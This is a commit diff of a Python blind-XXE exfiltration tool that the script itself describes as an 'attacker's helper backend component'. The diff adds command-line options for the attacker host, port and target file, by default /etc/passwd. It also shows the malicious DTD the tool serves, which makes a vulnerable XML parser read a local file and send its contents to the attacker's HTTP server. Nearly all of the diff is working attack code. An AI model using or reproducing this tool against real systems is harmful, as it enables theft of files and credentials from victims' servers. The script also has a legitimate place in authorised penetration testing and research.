Improved blindxxe.py script

web/blindxxe.py

@@ -11,7 +11,7 @@
 # 0. Configure global variables: SERVER_SOCKET and RHOST
 #
 # 1. Run the below script, using:
-#	$ python blindxxe.py <filepath>
+#   $ python blindxxe.py [options] <filepath>
 #
 #   where <filepath> can be for instance: "file:///etc/passwd"
 #
@@ -40,19 +40,21 @@ import urllib
 import re
 import sys
 import time
-import threading
 import socket
+import argparse
+import threading
 
 #
 # CONFIGURE THE BELOW VARIABLES
 #
 
-SERVER_SOCKET 	= ('0.0.0.0', 8000)
-EXFIL_FILE 		= 'file:///etc/passwd'
-
-# The host on which you will run this server
-RHOST 			= '192.168.56.1:' + str(SERVER_SOCKET[1])
-
+config = {
+    'debug' : '',
+    'listen' : '0.0.0.0',
+    'port' : 8080,
+    'rhost' : '',
+    'exfil-file' : '',
+}
 
 EXFILTRATED_EVENT = threading.Event()
 
@@ -97,7 +99,7 @@ class BlindXXEServer(BaseHTTPRequestHandler):
             #print '[DEBUG] Sending malicious DTD file.'
             dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
 <!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
-%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}
+%%param_request;''' % {'exfil_file' : config['exfil-file'], 'exfil_host' : config['rhost']}
 
             self.response(content_type='text/xml', body=dtd)
 
@@ -105,8 +107,59 @@ class BlindXXEServer(BaseHTTPRequestHandler):
             #print '[INFO] %s %s' % (request.command, request.path)
             self.response(body='false')
 
-def main():
-	server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
+
+def parseOptions(argv):
+    global config
+
+    print('''
+        :: Blind-XXE attacker's helper backend component
+        Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
+        Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
+''')
+
+    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
+
+    parser.add_argument('file', type=str, metavar='FILE', default='file:///etc/passwd', help = 'Specifies file to exfiltrate using Blind XXE technique.')
+    parser.add_argument('-l', '--listen', default='0.0.0.0', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: 0.0.0.0 (all interfaces)')
+    parser.add_argument('-p', '--port', metavar='PORT', default='8080', type=int, help='Specifies the port to listen on. Default: 8080')
+    parser.add_argument('-r', '--rhost', metavar='HOST', default=config['rhost'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities')
+
+    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
+
+    args = parser.parse_args()
+
+    config['debug'] = args.debug
+    config['listen'] = args.listen
+    config['port'] = int(args.port)
+    config['rhost'] = args.rhost
+    config['exfil-file'] = args.file
+
+    port = int(args.port)
+    if port < 1 or port > 65535:
+        Logger.err("Invalid port number. Must be in <1, 65535>")
+        sys.exit(-1)
+
+    return args
+
+def fetchRhost():
+    global config
+    config['rhost'] = socket.gethostbyname(socket.gethostname())
+
+def main(argv):
+    global config
+
+    fetchRhost()
+
+    opts = parseOptions(argv)
+    if not opts:
+        Logger.err('Options parsing failed.')
+        return False
+
+    print('[+] Serving HTTP server on: ("{}", {})'.format(
+        config['listen'], config['port']
+    ))
+
+    server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
     thread = threading.Thread(target=server.serve_forever)
     thread.daemon = True
     thread.start()
@@ -114,7 +167,7 @@ def main():
     while not EXFILTRATED_EVENT.is_set():
         pass
 
+    print('[+] File has been exfiltrated. Quitting.')
+
 if __name__ == '__main__':
-	if len(sys.argv) > 1:
-		EXFIL_FILE = sys.argv[1]
-	main()
+    main(sys.argv)